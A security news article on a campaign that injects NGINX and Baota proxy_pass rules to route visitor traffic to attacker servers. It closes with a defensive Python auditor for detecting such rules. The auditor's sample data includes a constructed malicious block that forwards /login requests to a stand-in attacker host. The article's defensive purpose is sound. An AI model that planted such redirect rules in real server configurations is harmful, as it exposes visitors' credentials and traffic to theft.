The silent hijacking of traffic: how NGINX, Baota and proxy_pass become tools of attackers


Cybersecurity researchers have brought to light an active campaign that manipulates NGINX installations and management panels such as Baota (BT) to redirect legitimate web traffic to infrastructure controlled by attackers. The technique does not rely on breaking cryptography or exploiting a flaw in the user's browser: instead, it modifies the web server's own configuration so that it quietly acts as a proxy to malicious destinations.

The Datadog Security Labs team has been one of the first to document this activity, linking it to the wave of exploitation of the flaw known as React2Shell (referred to in its report as CVE-2025-55182). According to their analysis, the attackers inject NGINX configuration blocks that capture incoming requests on specific paths and forward them through the proxy_pass directive to servers under their control, so they can inspect, modify or take advantage of visitors' communications. More technical details and examples are available in the Datadog report, and the proxy_pass directive is described in the official NGINX documentation.


What makes this campaign particularly dangerous is its automated character and persistence: the attackers have deployed a set of scripts that orchestrate the search for targets, the modification of files and persistence on compromised systems. The names identified by the researchers include zx.sh, which launches the following stages and uses common utilities such as curl or wget (or even raw TCP connections if those tools are blocked); bt.sh, which specifically targets environments with the Baota panel to overwrite configurations; 4zdh.sh and zdh.sh, which search the usual NGINX paths and refine the scope of the intrusion; and ok.sh, which generates a report of active malicious rules. These pieces form what analysts describe as a multilevel toolkit designed both to discover targets and to implement and maintain malicious redirection rules.

The operators behind this campaign do not seem uniform in their final objectives. GreyNoise, which monitors large-scale hostile network activity, identified that a few IP addresses have driven most of the exploitation attempts after React2Shell's disclosure, and that post-exploitation payloads vary: some retrieve executables for cryptomining, while others open reverse shells, suggesting interest in both automated resource abuse and interactive access. The GreyNoise analysis can be consulted on its site.

Another relevant point is the geographical and sectoral focus of the attackers. The observed patterns show a preference for the top-level domains of certain countries in Asia (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure and institutional spaces such as .edu and .gov domains. In addition, this activity comes in the context of large-scale reconnaissance campaigns that have sought access panels for products such as Citrix ADC and NetScaler Gateway through massive rotation of residential proxies and the use of public-cloud IPs, a coordinated effort that GreyNoise has documented in its reconnaissance analysis.

What are the risks of a compromised NGINX forwarding requests to attacker infrastructure? The consequences range from the theft of credentials and the collection of sensitive data to the possibility of inserting malicious content (e.g. scripts that affect users' browsers) or of routing traffic through intermediate servers for espionage operations. There is also the option of deploying follow-on payloads for mining, or backdoors that facilitate lateral movement within a corporate network.

For those who manage web servers, the signs of such a compromise are clear if you know where to look: unexpected "location" configurations that point to external upstreams, recently added or changed files in /etc/nginx or equivalent paths, repeated NGINX reloads outside the usual times, and processes that open persistent outgoing connections to unknown addresses. It is recommended to verify the integrity of the configuration files against backups, to audit changes in real time where possible, and to limit access to management panels such as Baota through access control lists and strong authentication.
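The two checks described above (location blocks whose proxy_pass leaves the host, and config files that differ from a known-good backup) can be scripted. The following Python auditor is an added example written for this article; it is not code from Datadog, GreyNoise or the NGINX project. The sample configuration files, the hostnames under .example, the 10.0.0.0/8 address and the operator-supplied allowlist are constructed placeholders, and the function names are my own. The parser is deliberately small: it drops comments and tracks block nesting with a stack, which is enough for ordinary configuration files but does not handle braces inside quoted strings.

```python
"""Audit NGINX configuration text for proxy_pass targets that leave the host,
and compare the live config set against a baseline taken from a backup."""
import hashlib
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample: a legitimate file plus a second file of the kind the
# article describes, whose /login block forwards requests to an outside host.
SAMPLE_CONFIGS = {
    "/etc/nginx/conf.d/app.conf": """
upstream app_backend {
    server 127.0.0.1:8080;
}
server {
    listen 80;
    location / {
        proxy_pass http://app_backend;
    }
    location /admin/ {
        proxy_pass http://10.0.0.5:9000;
    }
    location /static/ {
        root /var/www;
    }
}
""",
    "/etc/nginx/conf.d/zz-default.conf": """
server {
    listen 80;
    location /login {
        proxy_pass http://cdn-update.example:8080;  # constructed attacker host
        proxy_set_header Host $host;
    }
    location /api/ {
        proxy_pass https://api.internal.example;
    }
}
""",
}

UPSTREAM_RE = re.compile(r"upstream\s+(\S+)\s*\{")


def tokenize(text):
    """Yield ("open", header), ("close", None) or ("directive", text) events."""
    buf = ""
    for ch in re.sub(r"#[^\n]*", "", text):  # strip comments first
        if ch == "{":
            yield "open", buf.strip()
        elif ch == "}":
            yield "close", None
        elif ch == ";":
            yield "directive", buf.strip()
        else:
            buf += ch
            continue
        buf = ""


def find_proxy_targets(text):
    """Return (enclosing location header, proxy_pass target) pairs."""
    stack, found = [], []
    for kind, value in tokenize(text):
        if kind == "open":
            stack.append(value)
        elif kind == "close":
            stack.pop()
        else:
            parts = value.split()
            if len(parts) >= 2 and parts[0] == "proxy_pass":
                location = next((h for h in reversed(stack) if h.startswith("location")), "")
                found.append((location, parts[1]))
    return found


def is_external(target, upstreams, allowlist=()):
    """True unless the target is a declared upstream, a unix socket, localhost,
    a loopback/private/link-local address, or an operator-approved hostname."""
    if "://unix:" in target:
        return False
    host = urlsplit(target if "://" in target else "http://" + target).hostname or ""
    if host in upstreams or host == "localhost" or host in allowlist:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True  # a hostname nobody approved
    return not (ip.is_private or ip.is_loopback or ip.is_link_local)


def audit_configs(configs, allowlist=()):
    """Flag every proxy_pass that leaves the host, with file and location."""
    upstreams = set(UPSTREAM_RE.findall("\n".join(configs.values())))
    findings = []
    for path, text in configs.items():
        for location, target in find_proxy_targets(text):
            if is_external(target, upstreams, allowlist):
                findings.append({"file": path, "location": location, "proxy_pass": target})
    return findings


def sha256_text(text):
    return hashlib.sha256(text.encode()).hexdigest()


def diff_against_baseline(configs, baseline):
    """Compare the live config set with {path: sha256} recorded from a backup."""
    changes = {"added": [], "modified": [], "removed": []}
    for path, text in configs.items():
        if path not in baseline:
            changes["added"].append(path)
        elif baseline[path] != sha256_text(text):
            changes["modified"].append(path)
    changes["removed"] = [p for p in baseline if p not in configs]
    return changes


# Baseline recorded when only app.conf existed, so the second file shows up as added.
BASELINE = {"/etc/nginx/conf.d/app.conf": sha256_text(SAMPLE_CONFIGS["/etc/nginx/conf.d/app.conf"])}

if __name__ == "__main__":
    for finding in audit_configs(SAMPLE_CONFIGS, allowlist=("api.internal.example",)):
        print("EXTERNAL proxy_pass:", finding)
    print("baseline diff:", diff_against_baseline(SAMPLE_CONFIGS, BASELINE))
```

On a real server the dictionary would be built by reading the files under /etc/nginx (including anything pulled in by include directives) and the baseline would come from the last verified backup; running the script from cron alongside a watch on the directory's mtime covers both the "unexpected location" and the "recent files" signals in one pass.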

In addition to immediate detection and remediation, defence requires preventive action: keeping servers and administration panels up to date, patching publicly exploited vulnerabilities (such as those associated with React2Shell), restricting outgoing traffic with egress firewall rules to prevent unauthorized communications, and monitoring indicators of compromise related to typical post-exploitation payloads (miners or reverse shells). It is also appropriate to restrict the download tools and utilities available on the systems, since the attackers use curl, wget or direct TCP connections to fetch their components.


This incident is a reminder that the attack surface is not limited to the code of web applications, but includes the very infrastructure layer that serves them. A subtle change in NGINX settings can turn a legitimate server into a malicious intermediary without the owner noticing it immediately. The recommendation for operators and security teams is to act quickly: audit configurations, verify the origin of changes and ensure that management interfaces are protected and monitored.

For a deeper look at the technical findings and the tactics used by the attackers, refer to Datadog Security Labs' report on traffic hijacking in NGINX and to GreyNoise's follow-up on the consolidation of exploitation activity and on reconnaissance campaigns. It is also useful to review NGINX's official documentation on the proxy module to better understand how the proxy_pass directive is used in legitimate contexts.

In short, the combination of previously known vulnerabilities, exposed management panels and an automated toolkit has allowed attackers to scale up a campaign capable of redirecting traffic at large scale. The good news is that basic access controls, monitoring focused on configuration changes and strict egress policies can significantly reduce the attackers' operating window and allow intrusions to be detected quickly.
